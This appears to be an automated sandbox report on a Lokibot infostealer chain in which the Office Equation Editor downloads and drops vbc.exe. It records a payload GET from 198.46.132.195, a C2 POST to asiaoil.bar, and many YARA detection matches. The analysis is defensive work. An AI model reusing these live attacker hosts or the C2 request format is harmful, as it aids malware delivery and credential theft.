              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2b3lnzs0K50M9KlApGlxtS1%2FGBbpcngBLWZrh0QHIPyWMt9R51HhBbpbNzNiN2fgnCx%2F6Ol9cv3FYjGdC9Z4%2Ff%2B7v%2FeKPnRbogo3FCV4owbNiUoY5%2BcPZ%2FGa%2BNALAg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446972bed9091-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lLUedeVgcznC2S%2FUOpbd3fV7v3cGuLCjsT%2FMbiJAVwvVHvZbCBonSZeAGG5JhojOiJyGydHeh3PL5Tp9nmU4EBUX2wVPhLZEEPBr7kenjFn1%2BoSu1sUFZrFUzTyPOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db4469d8ada926e-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pP7Hm%2FZYo7nBNCdlCm%2B6iCgzILR5XUlKf4GwH1GgSKX5qjvCOl3q7%2FhYlNsVlCRNbRgfIjWoULsECCJWVGVm8TwlUOckIQOjjEp9dOME2g%2F3YvZInDvXJ3pNqXehHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446a48a19903d-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2B4Hpj5tBS1W25DrOmF70H9%2B7tI00TcoHrZ2vWxTGczWKIQtBUxqfhFCMGDZXE%2FiPTxLHEXRSNrcwpGvMMbC3NGIUBMWmkmFsI9cJLit7sz%2BX56ge756zUtFrYA%2Fn%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446ab4e2a9049-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:22:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=j%2BJFLdnSBYTENDu1tAbRmg3yPPpEafzaD1AIG2OO%2FT%2B%2FQqTuiDGTxzFlf9dnChU0IP%2BEp15Zkavznvg6v0hcTAYsTYetiP8tjAE8TcK4xJqEQeCFqj2PFKCcO8YbOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446b23dcd9241-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:00 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rk9UBUg8rEXXmstTEerwpTwam6ReU4ftvK8vLG6DGGX39NP0Tj8xTjWk5qWPBqpC6tqrpuX%2FZqaa1n1qmYBhnF44n8KZVoyEqklrYO98Ih0UxdfXxgiW0okoqK2%2FCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446b88b306963-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jtSZVRNhVan7fQu%2B%2BS3YF0dvuQRKfPnhQmljq7WJs%2Fj8JMEfpH8AMemLWNbqYw4tgA6v4NG3xTvYc3Z5%2FpGQb5ljWthkbv4uo%2FhbZQYC96NTyl%2B9dg2FM9CZdOcU%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446bf3ee59235-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Lp2m%2FnL%2FD9YbbOQL75qiqY1QRie4l95Zh1%2F9JFc7ntQcAGF4IIGoKgD%2F4oPRxszoZK9oVvGOpnhqWzAxSgnH3OqLPGrbcPmuYuhePgMIcrCkD3ZE2%2Bku1MZOs6ktMA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446c57aff90af-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:03 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VTMZeN6TFXbag2y1OBliS7F8Ve1jWw99EUBWoXAAGITxys1b9P94l43Uq0a%2B%2Fvyd8PfkcQkVRk9vtaYxi3J9PRjAhKWq89oNOgEI8T7X4pa5jNQ6EzOTmt9dPn8AJw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446cbfd179273-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3ixohb6DjBvyEHcF0bBjTjwa28InQY%2BYLPlgexuM%2B84%2F6oOs4V7fazNyzJ4xoT6rgqB9hhVA18VkbtDdbf8imwrd%2Bcpfb9TH%2BBpi1dLQ9%2FLh%2BYjGvjuxWzsCeqqBpA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446d23961910a-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:06 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EE%2FH1l4X4mMaNy6pFboc6LUO8GAlkZzav%2FOZJIxi5sLykIm1li2uICH5vhNS6WFsxhSSyzMACuulnYIlnwvZpCsgsM7VNvUGg6SyBgvKaTyfwg7BclNEWkPSWBEWjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446da4ba95c32-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=glNfx46H3%2BbVLTKDrhap51MhlIRkcModymLBNBd7dZ%2Bl67BTPpZNpBIlfD8OgL00wxL3CdtX6qUD2pekmgxeoZGkVArQG2lmbN%2B57FmuOEvY0CiRqZc24nnj2bPcgA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446eac805911f-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YpuHPmOjZQu3BJ71RrU5rE6ZD4gK%2FiddjmVX1894nkleKqaO0ZuA%2FZ4t0Hhr%2FEBANQiy%2F1dOteI5pqxTSy6LKaSwgoWmbo0Tuise9gruTiTrmWfL3ef0CFnSmrOP6A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446f1795e8fd4-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=263d7oWUNYmuRg8qalPaQG1rkbIXer23yE4CCwJl%2BycPuClpFI6FPf1gIeOZyF3Nt4DWuR0XxZA%2FK2Gwfg9%2FRUCXAmdrBxYU%2F%2FgwYdWQXfhfADT4oSnWfcr7aGjXFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446f7fa7290a3-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rZcJVrDpVn0Jvm1Vx3izcMxx2xxi%2BRY0gOKUM%2BjgWD%2BYJ2bGoZJPCLIhbsX3VLB%2FEbDTmlKbO8MOV5p8OY13hTQVrNs14q81gtqG%2BYeK%2B7ujkKePtZGTix4rgIZT4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db446fe7f4690fe-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 10 Feb 2022 09:23:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hiz8VTs2nqW2CMp0oz2HdrtKIKW9o%2B7ImEcKl2VS1ifwy0ulNriRcW%2FuIGG1IoL3PiyPTyaWq%2BPUB82nqy1x%2F7uZPeiH7cbbBHoH7NU9xoGBLymRw5hquZwyAOhtcQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6db44705396d911e-FRAData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
              Source: unknown TCP traffic detected without corresponding DNS query: 198.46.132.195
              Source: vbc.exe, vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: vbc.exe, 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmp, vbc.exe, 00000004.00000000.452029619.0000000000409000.00000008.00000001.01000000.00000003.sdmp, vbc.exe.2.dr, .win32[1].exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: xmtxpy.exe, xmtxpy.exe, 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, xmtxpy.exe, 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: unknown HTTP traffic detected:
                  POST //bobby/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: asiaoil.bar
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 579BFA72
                  Content-Length: 176
                  Connection: close
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AB951BC.emf
              Source: unknown DNS traffic detected: queries for: asiaoil.bar
              Source: C:\Users\user\AppData\Local\Temp\xmtxpy.exe Code function: 6_2_00404ED4 recv,
              Source: global traffic HTTP traffic detected:
                  GET /windowSSH/.win32.exe HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                  Host: 198.46.132.195
                  Connection: Keep-Alive
              Source: C:\Users\Public\vbc.exe Code function: 4_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

              System Summary

              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 5.2.xmtxpy.exe.130000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.13.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
              Source: 6.0.xmtxpy.exe.400000.11.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000002.669282613.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000005.00000002.464120998.0000000000130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.460143750.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.461992324.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.463022626.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
              Source: 00000006.00000000.460963189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.win32[1].exe
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.2.xmtxpy.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.11.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.15.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 5.2.xmtxpy.exe.130000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.2.xmtxpy.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
              Source: 6.0.xmtxpy.exe.400000.15.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
